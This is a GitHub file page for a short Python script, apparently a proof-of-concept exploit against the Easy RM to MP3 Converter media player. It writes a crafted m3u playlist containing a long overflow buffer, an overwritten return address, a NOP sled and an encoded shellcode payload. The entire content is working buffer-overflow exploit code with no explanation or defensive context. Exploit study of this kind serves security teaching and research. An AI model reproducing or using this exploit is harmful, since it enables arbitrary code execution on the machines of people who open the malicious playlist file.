-
Notifications
You must be signed in to change notification settings - Fork 1
/
easyrm2mp3_exploit.py
executable file
·20 lines (20 loc) · 1.05 KB
/
easyrm2mp3_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
f=open("m3u.m3u","w")
buf="\x41"*26059 + "\xEB\xEA\x94\x7c" + "\x90"*50
buf+=("\xbd\xa1\x22\x81\x10\xda\xcd\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x33\x83\xc3\x04\x31\x6b\x0e\x03\xca\x2c\x63\xe5\xf0\xd9\xea"
"\x06\x08\x1a\x8d\x8f\xed\x2b\x9f\xf4\x66\x19\x2f\x7e\x2a\x92"
"\xc4\xd2\xde\x21\xa8\xfa\xd1\x82\x07\xdd\xdc\x13\xa6\xe1\xb2"
"\xd0\xa8\x9d\xc8\x04\x0b\x9f\x03\x59\x4a\xd8\x79\x92\x1e\xb1"
"\xf6\x01\x8f\xb6\x4a\x9a\xae\x18\xc1\xa2\xc8\x1d\x15\x56\x63"
"\x1f\x45\xc7\xf8\x57\x7d\x63\xa6\x47\x7c\xa0\xb4\xb4\x37\xcd"
"\x0f\x4e\xc6\x07\x5e\xaf\xf9\x67\x0d\x8e\x36\x6a\x4f\xd6\xf0"
"\x95\x3a\x2c\x03\x2b\x3d\xf7\x7e\xf7\xc8\xea\xd8\x7c\x6a\xcf"
"\xd9\x51\xed\x84\xd5\x1e\x79\xc2\xf9\xa1\xae\x78\x05\x29\x51"
"\xaf\x8c\x69\x76\x6b\xd5\x2a\x17\x2a\xb3\x9d\x28\x2c\x1b\x41"
"\x8d\x26\x89\x96\xb7\x64\xc7\x69\x35\x13\xae\x6a\x45\x1c\x80"
"\x02\x74\x97\x4f\x54\x89\x72\x34\xaa\xc3\xdf\x1c\x23\x8a\xb5"
"\x1d\x2e\x2d\x60\x61\x57\xae\x81\x19\xac\xae\xe3\x1c\xe8\x68"
"\x1f\x6c\x61\x1d\x1f\xc3\x82\x34\x7c\x82\x10\xd4\xad\x21\x91"
"\x7f\xb2")
f.write(buf)
f.close()